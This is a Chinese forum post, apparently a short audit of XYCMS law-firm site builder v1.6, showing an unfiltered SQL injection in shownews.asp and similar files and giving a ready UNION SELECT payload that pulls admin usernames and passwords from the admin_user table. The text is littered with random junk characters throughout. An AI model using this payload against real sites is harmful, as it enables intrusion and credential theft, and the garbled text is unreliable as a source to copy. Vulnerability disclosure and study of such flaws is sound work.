前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似: q5 X; L4 R. c; A2 o4 `
/ |$ q" K& P- L6 L; b8 g淫荡分割线: g( p' G- J e' N
--------------------------------------------------------
: G$ C- C! R" [
$ X2 J( Q4 {/ G: U审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)3 F0 }/ X+ M( D2 K" V0 X
源码地址:http://down.chinaz.com/soft/29233.htm
& L: c" H& d3 R7 z$ T5 O2 e 5 y7 w. Q5 k. S7 y
漏洞文件:shownews.asp* o8 W/ a& V0 v0 Y O/ t( s9 X
漏洞代码:7-13行
% r, O1 P4 H' \1 L6 f1 p$ s 4 g2 u) F5 ]; ~; Z1 w
9 e& y; z b. t6 l
<% 4 U" F% {5 q0 f) k$ O# w% Z
id=request.QueryString("id")
$ e# |) E$ f* i" C
6 E" \. C# v5 j2 L) n& kset snews=server.createobject("adodb.recordset")
5 L# P7 B2 _$ {8 d5 ]' `- B8 \4 _exec="select * from [news] where id="&id+ w6 e2 d7 y9 Q" l' c7 ~. U
snews.open exec,conn,1,1
* c) l l* A9 ?; y+ b%>& \0 ^* n1 b: R& i1 E# t+ o" r
; y, |7 X6 T& W* k
, \% R9 l7 b- W* [什么过滤都没有 直造成注入1 h/ a: n, y- N; U" K! h
( B0 j P7 ?3 Q4 T* t( M
注入点:http://127.0.0.1:99/shownews.asp?id=xx
6 Q3 ]6 A1 {- s) k$ v* S) G* p 4 d3 L# ~) [5 _4 @
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找0 D2 Y+ y3 ~$ T
& S0 m' S# m7 m. ]
( H; `9 Y7 M& Q5 O, r- Y9 s1 G
exp: union select 1,admin,password,4,5,7 from admin_user
5 @# ]& V6 c1 ^8 |2 S4 V4 G
* g8 y; f8 b7 Z2 e7 o9 J9 m |